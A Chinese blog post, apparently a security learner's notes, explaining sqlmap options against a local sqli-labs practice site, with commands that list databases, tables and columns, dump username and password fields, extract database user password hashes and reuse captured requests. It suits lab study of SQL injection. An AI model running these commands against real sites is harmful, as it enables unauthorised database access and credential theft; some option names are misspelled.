【Try to Hack】sqlmap

举报
开心星人 发表于 2022/06/30 00:47:51 2022/06/30
【摘要】 📒博客主页:开心星人的博客主页 🔥系列专栏:Try to Hack 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间:🌴2022年5月27日🌴 🍭作者水平很有限,如果发现错误,还望告...

📒博客主页:开心星人的博客主页
🔥系列专栏:Try to Hack
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年5月27日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

《web安全功防》学习所得

最简单使用-u
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1

当注入点后参数大于一个时,需要加双引号
python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1&uid=2"
一个参数的时候,url可以不加双引号

–dbs查询当前用户下所有数据库
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --dbs

-D 数据库名称 --tables 查某一数据库下所有表
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security --tables

-D 数据库名称 -T 表名 --columns 查某一数据库下某一表中全部字段名称
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T user_info --columns

-D 数据库名称 -T 表名 -C 字段名称 --dump 查某一数据库下某一表中某一字段的内容
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T user_info -C username,password --dump

–users 获取数据库所有用户
在当前用户有读取包含所有用户表的权限时,使用该命令就可以列出所有管理用户
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --users

–passwords 获取数据库用户的密码
在当前用户有读取包含所有用户密码的权限时,使用该命令就可以列出所有管理用户
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --passwords

–cuurent-db 获取当前网站数据库的名称
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --cuurent-db

–cuurent-user 获取当前网站数据库的用户名称的名称
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --cuurent-user

–level 5 探测等级
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --level 5
一共有1~5个等级
这个参数会影响测试的注入点。
GET和POST的数据都会进行测试
如果不加,默认为1
level为2时会测试HTTP cookie
level为3时会测试HTTP User-Agent/Referer
建议使用5

–risk 5 风险等级
risk增加后,sql语句不仅会包含select语句,也会包含insert、delete、update等sql语句,很可能会对数据库造成严重的破坏,所以不建议调高risk等级
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --risk 3
建议使用3

–batch 非交互式
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --batch
使用sqlmap时总是会提示然你选择是否继续之类的,–batch之后,就一直使用默认的选项,不需要进行交互

–dbms 数据库
当提前知道数据库是mysql或者access等数据库时,可使用该参数,加快检测效率
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --dbms mysql

–is-dba 判断当前用户是否为管理权限
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --is-dba

-v 显示信息
-vx(x指数字)
0:只显示Python的回溯,错误和关键消息。
1:显示信息和警告消息。
2:显示调试消息。
3:显示有效载荷注入。
4:显示HTTP请求。
5:显示HTTP响应头。
6:显示HTTP响应页面的内容
python2 sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -v4

-r 文本路径 判断文本中的请求是否存在注入
非常有用
在文件中加载HTTP请求,这样就可以不用设置其他参数(如cookie、POST数据),txt文件可以用bp抓包获得
在这里插入图片描述
python2 sqlmap.py -r 1.txt

一般在存在cookie注入时使用,或者当一个网站需要登录,那么就需要携带cookie,否则没法访问

后面也就是和正常使用一样
python2 sqlmap.py -r 文件路径名 -D 数据库名 --batch --tables

文章来源: blog.csdn.net,作者:开心星人,版权归原作者所有,如需转载,请联系作者。

原文链接:blog.csdn.net/qq_55675216/article/details/124997516

【版权声明】本文为华为云社区用户转载文章,如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。